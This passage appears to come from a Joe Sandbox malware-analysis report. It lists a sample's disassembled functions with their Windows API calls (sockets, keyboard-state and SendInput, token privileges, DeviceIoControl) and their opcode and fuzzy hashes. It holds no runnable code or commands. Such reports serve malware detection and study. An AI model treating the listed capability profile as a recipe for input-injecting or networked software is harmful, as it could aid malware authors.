                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow
                                          • String ID:
                                          • API String ID: 3379773720-0
                                          • Opcode ID: 63a6ae8f661a4e08b4b94776fc84482aab8b6770dce478fc523523da6fa375de
                                          • Instruction ID: 67efd406c4f6a83e91122808bafcfc3f185fa5bff3afcb5e5e43517cc29dc184
                                          • Opcode Fuzzy Hash: 63a6ae8f661a4e08b4b94776fc84482aab8b6770dce478fc523523da6fa375de
                                          • Instruction Fuzzy Hash: 2141BE75A00308AFDF11EF54C846FEE7BB9EF49750F404029F945A32D2DBB19A44CAA2
                                          Function 00127095 Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                          Download Yara Rule
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 001270BC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 001270CC
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00127130
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0012713C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          • Opcode ID: 3c4dc5648e3847310fb2db21ad08384313ef8acf4637deb886c1719b9713009c
                                          • Instruction ID: bb2f0b42d445f1b6fa7902afcf577178db26a73108823e8bc11482a655208c82
                                          • Opcode Fuzzy Hash: 3c4dc5648e3847310fb2db21ad08384313ef8acf4637deb886c1719b9713009c
                                          • Instruction Fuzzy Hash: F641AE757402106FEB25AF24EC86FAA77A4DF04B10F048458FA59AB3D3DB749E108B95
                                          Function 00126B05 Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00140980), ref: 00126B92
                                          • _strlen.LIBCMT ref: 00126BC4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          • Opcode ID: 06f91d89eb902170a1f5e9c8226a153c03b87ec37d817f98f1da88eb3003d64f
                                          • Instruction ID: c19ba70fc9ab1387e4826e8dc71d13c0462ba52b5c86d59f1049a628634aa3e1
                                          • Opcode Fuzzy Hash: 06f91d89eb902170a1f5e9c8226a153c03b87ec37d817f98f1da88eb3003d64f
                                          • Instruction Fuzzy Hash: 7B41A071A00119ABCB14FB64EC95FEEB3A9EF54310F148159F91A972D3DB30AE61C790
                                          Function 00138E76 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00138F03
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: b41806f7595c8b4cbf921f0c3135fb22b2529c261efae50e32ebbe6f9055a553
                                          • Instruction ID: 0478ef645973a8fe4a0eea5ae4e8791f3bcec73fb21b40c887a1da637655e365
                                          • Opcode Fuzzy Hash: b41806f7595c8b4cbf921f0c3135fb22b2529c261efae50e32ebbe6f9055a553
                                          • Instruction Fuzzy Hash: 6331B034614318EFEF259B18CC49FAC37AAEB0A320F244511FA15D65E1DF75E990CB51
                                          Function 0013B1A9 Relevance: 6.1, APIs: 4, Instructions: 106windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0013B1D2
                                          • GetWindowRect.USER32(?,?), ref: 0013B248
                                          • PtInRect.USER32(?,?,0013C6BC), ref: 0013B258
                                          • MessageBeep.USER32(00000000), ref: 0013B2C9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: 2361febdb855e311f2377370efda546d4fbe6cc60563b9760420730ff58d4a58
                                          • Instruction ID: 9f32ad9d3c72229de0c320c7d091ec38399a4459067852d2b91526dc02b64257
                                          • Opcode Fuzzy Hash: 2361febdb855e311f2377370efda546d4fbe6cc60563b9760420730ff58d4a58
                                          • Instruction Fuzzy Hash: 90418130A08115DFDF11CF98C8C4B9E77F5FF49350F1842A9EA189B265E730A981CB51
                                          Function 001112D5 Relevance: 6.1, APIs: 4, Instructions: 105keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00111326
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00111342
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001113A8
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001113FA
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 6776eacf4a1a815aeeccc5fce75d61076035ff249928277ed41e86bea82dd3c3
                                          • Instruction ID: d9afe39f2e9bfb9a3d3bf2917b4873e2265f2d4bd92487a98c77bb3f9b28b5b5
                                          • Opcode Fuzzy Hash: 6776eacf4a1a815aeeccc5fce75d61076035ff249928277ed41e86bea82dd3c3
                                          • Instruction Fuzzy Hash: AA313930D54618BEFF3D86258805BFDFBA6BB49330F04422AE6A0529D9D3748DC19B55
                                          Function 00111410 Relevance: 6.1, APIs: 4, Instructions: 101keyboardwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00111465
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00111481
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 001114E0
                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00111532
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 5762d67479d7fc42cb69407e0fe92a3087d48077ed58c88d04b094767d923146
                                          • Instruction ID: 5bda2fdfa5c9e1c521c215a883071ebf1f47f4f7b4eb375ddeff77185c12a83f
                                          • Opcode Fuzzy Hash: 5762d67479d7fc42cb69407e0fe92a3087d48077ed58c88d04b094767d923146
                                          • Instruction Fuzzy Hash: 12315C309442187EFF3D8A659C047FEFB66AB99710F48433AE681529D1C37889D19BA1
                                          Function 000E63F5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000E642B
                                          • __isleadbyte_l.LIBCMT ref: 000E6459
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000E6487
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000E64BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 798c594cd254104b984307a2dac88b9982634a264f4e4f87d522d9faba7659c5
                                          • Instruction ID: 1306a2fa2f0568efa50c0e44b8d190d4213e6f44b29706275b37529f2204fc56
                                          • Opcode Fuzzy Hash: 798c594cd254104b984307a2dac88b9982634a264f4e4f87d522d9faba7659c5
                                          • Instruction Fuzzy Hash: 6C31F2B1600296AFDB218F66DC44BAB7FE5FF51390F154029F824A71E1DB32E990D750
                                          Function 0013552B Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0013553F
                                            • Part of subcall function 00113B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00113B4E
                                            • Part of subcall function 00113B34: GetCurrentThreadId.KERNEL32 ref: 00113B55
                                            • Part of subcall function 00113B34: AttachThreadInput.USER32(00000000,?,001155C0), ref: 00113B5C
                                          • GetCaretPos.USER32(?), ref: 00135550
                                          • ClientToScreen.USER32(00000000,?), ref: 0013558B
                                          • GetForegroundWindow.USER32 ref: 00135591
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 1d060d487ecbf3be8fdd01ca3dbd61b66fd01f033f2c4f5c93e994fa2a44e80a
                                          • Instruction ID: 0660e802605a99f4eed2f4eeb13b12d8b13fd66fc44f3923213df513d553b157
                                          • Opcode Fuzzy Hash: 1d060d487ecbf3be8fdd01ca3dbd61b66fd01f033f2c4f5c93e994fa2a44e80a
                                          • Instruction Fuzzy Hash: 3A312B71D00108AFDB00EFA5D8859EEB7F9EF98704F10446AE915E7252EB75AF40CBA0
                                          Function 0013CB40 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • GetCursorPos.USER32(?), ref: 0013CB7A
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000EBCEC,?,?,?,?,?), ref: 0013CB8F
                                          • GetCursorPos.USER32(?), ref: 0013CBDC
                                          • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,000EBCEC,?,?,?), ref: 0013CC16
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Cursor$LongMenuPopupProcTrackWindow
                                          • String ID:
                                          • API String ID: 2864067406-0
                                          • Opcode ID: 07a4015f611f0ab230ff6d82dcb2185a934add5600811cf1a7b1ed7f5471a6ef
                                          • Instruction ID: bdec606fac7e1b03f500a727fdaab2a1624f42748369c7a7f85e5dc4ac3fe6db
                                          • Opcode Fuzzy Hash: 07a4015f611f0ab230ff6d82dcb2185a934add5600811cf1a7b1ed7f5471a6ef
                                          • Instruction Fuzzy Hash: 6831A035600158AFCB15CF59CC59EFABBB5EB4A350F044099F909AB6A1C7329D90EFA0
                                          Function 000D0BC0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                          Download Yara Rule
                                          APIs
                                          • __setmode.LIBCMT ref: 000D0BE2
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00117E51,?,?,00000000), ref: 000C4041
                                            • Part of subcall function 000C402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00117E51,?,?,00000000,?,?), ref: 000C4065
                                          • _fprintf.LIBCMT ref: 000D0C19
                                          • OutputDebugStringW.KERNEL32(?), ref: 0010694C
                                            • Part of subcall function 000D4CCA: _flsall.LIBCMT ref: 000D4CE3
                                          • __setmode.LIBCMT ref: 000D0C4E
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                          • String ID:
                                          • API String ID: 521402451-0
                                          • Opcode ID: 984b8f60ec606f59ed9eaaaa46f0444839b28ae71019d6049bac81356e53e929
                                          • Instruction ID: 8dec2160417251df2017cd7c1e1022ff2d5b18a40b7762cba3dc747ce0ea549d
                                          • Opcode Fuzzy Hash: 984b8f60ec606f59ed9eaaaa46f0444839b28ae71019d6049bac81356e53e929
                                          • Instruction Fuzzy Hash: 0B11D2319043046BCB18BBA4AC47AFEBB699F41320F14415BF208563C3DF71599297B5
                                          Function 00109274 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00108D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00108D3F
                                            • Part of subcall function 00108D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00108D49
                                            • Part of subcall function 00108D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D58
                                            • Part of subcall function 00108D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D5F
                                            • Part of subcall function 00108D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00108D75
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 001092C1
                                          • _memcmp.LIBCMT ref: 001092E4
                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0010931A
                                          • HeapFree.KERNEL32(00000000), ref: 00109321
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                          • String ID:
                                          • API String ID: 1592001646-0
                                          • Opcode ID: 4c8d052c43ca4d2bb23c66e2100a2126d8244a06c5e3f1c8dd6519118a2f8529
                                          • Instruction ID: 8f8fceb52ef527ae5b71886e3e9f99a240f96f764fc3a7744bbe8279df77c95a
                                          • Opcode Fuzzy Hash: 4c8d052c43ca4d2bb23c66e2100a2126d8244a06c5e3f1c8dd6519118a2f8529
                                          • Instruction Fuzzy Hash: 9B21AF71E40108EFDB10DFA4C955BEEB7B8FF44301F044059E894AB292D7B0AA44CFA0
                                          Function 0013634E Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetWindowLongW.USER32(?,000000EC), ref: 001363BD
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001363D7
                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 001363E5
                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 001363F3
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$Long$AttributesLayered
                                          • String ID:
                                          • API String ID: 2169480361-0
                                          • Opcode ID: dfcf4ddf4a19ebe40bb20d2ec21fecc37c27fa3378e2e05e7a392da2955d43a0
                                          • Instruction ID: 68db90d04205d5058b2a549a2d310eea51e996c15155767d342337b47932cb94
                                          • Opcode Fuzzy Hash: dfcf4ddf4a19ebe40bb20d2ec21fecc37c27fa3378e2e05e7a392da2955d43a0
                                          • Instruction Fuzzy Hash: D711AC35305514AFDB05AB24DC55FBA77A9EF86320F148118FA1ACB2E2CBB5AD408B94
                                          Function 0010E45A Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0010F858: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?), ref: 0010F867
                                            • Part of subcall function 0010F858: lstrcpyW.KERNEL32(00000000,?,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010F88D
                                            • Part of subcall function 0010F858: lstrcmpiW.KERNEL32(00000000,?,0010E46F,?,?,?,0010F262,00000000,000000EF,00000119,?,?), ref: 0010F8BE
                                          • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E488
                                          • lstrcpyW.KERNEL32(00000000,?,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E4AE
                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,0010F262,00000000,000000EF,00000119,?,?,00000000), ref: 0010E4E2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: lstrcmpilstrcpylstrlen
                                          • String ID: cdecl
                                          • API String ID: 4031866154-3896280584
                                          • Opcode ID: 62983fdf16da373a1e58a7cb51651694c338fff6b4d794748ee921146e1c020b
                                          • Instruction ID: 06554c4e41d82400a34f1083a3645febef3d48b146311df88cf19addb02aa59b
                                          • Opcode Fuzzy Hash: 62983fdf16da373a1e58a7cb51651694c338fff6b4d794748ee921146e1c020b
                                          • Instruction Fuzzy Hash: 1711033A100344AFCB25AF25DC09D7A7BE8FF45310B40442BF946CB2A0EBB1D890CBA0
                                          Function 000E5312 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          • _free.LIBCMT ref: 000E5331
                                            • Part of subcall function 000D593C: __FF_MSGBANNER.LIBCMT ref: 000D5953
                                            • Part of subcall function 000D593C: __NMSG_WRITE.LIBCMT ref: 000D595A
                                            • Part of subcall function 000D593C: RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000004,?,?,000D1003,?), ref: 000D597F
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AllocateHeap_free
                                          • String ID:
                                          • API String ID: 614378929-0
                                          • Opcode ID: 5bdd186e1845ee716ad739cedd7cce2f7d84c55db98210550683e35a82ffeb04
                                          • Instruction ID: ca30635f243a26e330c34eeda845a0ccc0e29d5d473fe6194fc1ee08110c3aa6
                                          • Opcode Fuzzy Hash: 5bdd186e1845ee716ad739cedd7cce2f7d84c55db98210550683e35a82ffeb04
                                          • Instruction Fuzzy Hash: 5C113D31405F45AFCB353F72AC0169E3BD56F153A6F204D27F918A62E2DEB08A808760
                                          Function 00114365 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00114385
                                          • _memset.LIBCMT ref: 001143A6
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 001143F8
                                          • CloseHandle.KERNEL32(00000000), ref: 00114401
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
